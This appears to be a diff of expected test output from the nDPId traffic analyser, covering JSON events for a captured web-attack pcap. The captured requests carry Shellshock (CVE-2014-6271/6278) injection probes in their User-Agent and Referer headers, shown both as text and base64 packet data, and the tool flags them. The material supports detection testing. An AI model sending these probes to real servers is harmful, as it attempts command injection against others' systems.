+01152{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":472,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277432,"flow_last_seen":1576420277432,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277432,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50506,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php4","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":473,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277433,"flow_last_seen":1576420277433,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277433,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50508,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":473,"flow_packet_id":1,"flow_last_seen":1576420277433,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1576420277433,"pkt":"AAAAAAAAAAAAAAAACABFAAEFSMVAAEAG8yt\/AAABfwAAAcVMH5DeS3AOoHbKrYAYAED++QAAAQEICp1m\/eGdZv3hR0VUIC9waHA1IEhUVFAvMS4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01152{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":473,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277433,"flow_last_seen":1576420277433,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277433,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50508,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php5","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01152{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":473,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277433,"flow_last_seen":1576420277433,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277433,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50508,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php5","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":474,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277434,"flow_last_seen":1576420277434,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277434,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50510,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":474,"flow_packet_id":1,"flow_last_seen":1576420277434,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277434,"pkt":"AAAAAAAAAAAAAAAACABFAAEI0WFAAEAGaox\/AAABfwAAAcVOH5BRy+mS7UbDZYAYAED+\/AAAAQEICp1m\/eKdZv3iR0VUIC9waHAtY2dpIEhUVFAvMS4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="} -01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":474,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277434,"flow_last_seen":1576420277434,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277434,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50510,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php-cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":474,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277434,"flow_last_seen":1576420277434,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277434,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50510,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php-cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":475,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277436,"flow_last_seen":1576420277436,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277436,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50512,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":475,"flow_packet_id":1,"flow_last_seen":1576420277436,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277436,"pkt":"AAAAAAAAAAAAAAAACABFAAEIqnVAAEAGkXh\/AAABfwAAAcVQH5Bll5K9uysWxoAYAED+\/AAAAQEICp1m\/eOdZv3jR0VUIC9waHAuY2dpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="} -01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":475,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277436,"flow_last_seen":1576420277436,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277436,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50512,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":475,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277436,"flow_last_seen":1576420277436,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277436,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50512,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":476,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277437,"flow_last_seen":1576420277437,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277437,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50514,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":476,"flow_packet_id":1,"flow_last_seen":1576420277437,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277437,"pkt":"AAAAAAAAAAAAAAAACABFAAEJlAhAAEAGp+R\/AAABfwAAAcVSH5AUHqzKqBdRL4AYAED+\/QAAAQEICp1m\/eWdZv3lR0VUIC9waHAuZmNnaSBIVFRQLzEuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":476,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277437,"flow_last_seen":1576420277437,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277437,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50514,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php.fcgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":476,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277437,"flow_last_seen":1576420277437,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277437,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50514,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php.fcgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":477,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277438,"flow_last_seen":1576420277438,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277438,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50516,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":477,"flow_packet_id":1,"flow_last_seen":1576420277438,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277438,"pkt":"AAAAAAAAAAAAAAAACABFAAEJhwhAAEAGtOR\/AAABfwAAAcVUH5Cc4b\/Kjk5kuIAYAED+\/QAAAQEICp1m\/eadZv3mR0VUIC9wcmludGVudiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":477,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277438,"flow_last_seen":1576420277438,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277438,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50516,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/printenv","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":477,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277438,"flow_last_seen":1576420277438,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277438,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50516,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/printenv","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":478,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277439,"flow_last_seen":1576420277439,"flow_idle_time":7580000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277439,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50518,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00779{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":478,"flow_packet_id":1,"flow_last_seen":1576420277439,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1576420277439,"pkt":"AAAAAAAAAAAAAAAACABFAAETyIlAAEAGc1l\/AAABfwAAAcVWH5DyzvBYc36tz4AYAED\/BwAAAQEICp1m\/eedZv3nR0VUIC9yZXN0b3JlX2NvbmZpZy5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} -01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":478,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277439,"flow_last_seen":1576420277439,"flow_idle_time":7580000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277439,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50518,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/restore_config.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":478,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277439,"flow_last_seen":1576420277439,"flow_idle_time":7580000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277439,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50518,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/restore_config.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":479,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277442,"flow_last_seen":1576420277442,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277442,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50520,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00765{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":479,"flow_packet_id":1,"flow_last_seen":1576420277442,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277442,"pkt":"AAAAAAAAAAAAAAAACABFAAEICV1AAEAGMpF\/AAABfwAAAcVYH5Aa\/jGM\/2VZ0IAYAED+\/AAAAQEICp1m\/eqdZv3pR0VUIC9ydWJ5LnJiIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":479,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277442,"flow_last_seen":1576420277442,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277442,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50520,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ruby.rb","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
